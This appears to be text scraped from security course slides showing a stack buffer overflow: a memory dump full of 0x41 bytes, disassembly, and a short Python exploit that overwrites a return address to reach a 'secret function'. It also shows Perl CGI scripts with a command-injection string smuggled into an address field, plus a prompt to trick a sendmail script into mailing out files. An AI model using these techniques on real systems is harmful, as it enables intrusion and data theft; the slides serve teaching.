0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 ?
22
0x0000000100000e40 : push %rbp 0x0000000100000e41 : mov %rsp,%rbp 0x0000000100000e44 : lea 0x65(%rip),%rdi # 0x100000eb0 0x0000000100000e4b : callq 0x100000ea4 0x0000000100000e50 : leaveq 0x0000000100000e51 : retq rip 0x000100000e40 rbp 0x414141414141 rsp 0x7fff5fbff818 0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 ? Hello secret1( ) !!!
23
$ poof Input: A You entered A. $ cat poop import struct rip = 0x0000000100000e40 print("A"*24 + struct.pack("<q", rip)) $ python poop | poof Input: You entered AAAAAAAAAAAAAAAAAAAAAAAA@^N. You found the secret function No. 1! Segmentation fault $
24
#!/usr/bin/perl # funky CGI script example $dest = "foo1"; # pretend this is the destination address from the user open (MAIL,"| /bin/cat >$dest "); # pretend this was a call to sendmail print MAIL "To: $dest\nFrom: me\n\nHi there!\n"; close MAIL; !/usr/bin/perl # funky CGI script example $dest = "foo1; echo 'this could be bad!';find. -name '*.c' -print;"; open (MAIL,"| /bin/cat >$dest "); # pretend this was a call to sendmail print MAIL "To: $dest\nFrom: me\n\nHi there!\n"; close MAIL;
25
/usr/bin/perl –w # (1) quit unless we have the correct number of command-line args $num_args = $#ARGV + 1; if ($num_args != 2) { print "\nUsage: name.pl email-address brief-message\n"; exit; } # (2) we got two command line args, so assume it’s address $dest=$ARGV[0]; $content=$ARGV[1]; my $sendmail = "/usr/sbin/sendmail -t"; #open (MAIL,"| /bin/cat >$dest "); # pretend this was a call to sendmail open (MAIL,"|$sendmail") or die "Cannot open sendmail: $!"; print MAIL "To: $dest\n"; print MAIL "From: me\n"; print MAIL "Subject: test\n"; print MAIL "Content-type: text/plain\n\n"; print MAIL $content; close MAIL; Run it with./tryit.pl ccpalmer “Some long message here inside quotes” Could you find a way to trick the perl script into mailing you some file that it shouldn’t???
![/usr/bin/perl –w # (1) quit unless we have the correct number of command-line args $num_args = $#ARGV + 1; if ($num_args != 2) { print \nUsage: name.pl -address brief-message\n ; exit; } # (2) we got two command line args, so assume it’s address $dest=$ARGV[0]; $content=$ARGV[1]; my $sendmail = /usr/sbin/sendmail -t ; #open (MAIL, | /bin/cat >$dest ); # pretend this was a call to sendmail open (MAIL, |$sendmail ) or die Cannot open sendmail: $! ; print MAIL To: $dest\n ; print MAIL From: me\n ; print MAIL Subject: test\n ; print MAIL Content-type: text/plain\n\n ; print MAIL $content; close MAIL; Run it with./tryit.pl ccpalmer Some long message here inside quotes Could you find a way to trick the perl script into mailing you some file that it shouldn’t](http://images.slideplayer.com./26/8862171/slides/slide_25.jpg "/usr/bin/perl –w # (1) quit unless we have the correct number of command-line args $num_args = $#ARGV + 1; if ($num_args != 2) { print \nUsage: name.pl -address brief-message\n ; exit; } # (2) we got two command line args, so assume it’s address $dest=$ARGV[0]; $content=$ARGV[1]; my $sendmail = /usr/sbin/sendmail -t ; #open (MAIL, | /bin/cat >$dest ); # pretend this was a call to sendmail open (MAIL, |$sendmail ) or die Cannot open sendmail: $! ; print MAIL To: $dest\n ; print MAIL From: me\n ; print MAIL Subject: test\n ; print MAIL Content-type: text/plain\n\n ; print MAIL $content; close MAIL; Run it with./tryit.pl ccpalmer Some long message here inside quotes Could you find a way to trick the perl script into mailing you some file that it shouldn’t")
Similar presentations
![Array_strcpy void array_strcpy(char dest[], char src[]) { int i = 0; while (src[i] != '\0') { dest[i] = src[i]; i++; } dest[i] = '\0'; }](/12/3408609/big_thumb.jpg "Array_strcpy void array_strcpy(char dest[], char src[]) { int i = 0; while (src[i] != '\0') { dest[i] = src[i]; i++; } dest[i] = '\0'; }>")
![1 #include void silly(){ char s[30]; gets(s); printf(%s\n,s); } main(){ silly(); return 0; }](/25/8018656/big_thumb.jpg "1 #include void silly(){ char s[30]; gets(s); printf(%s\n,s); } main(){ silly(); return 0; }>")
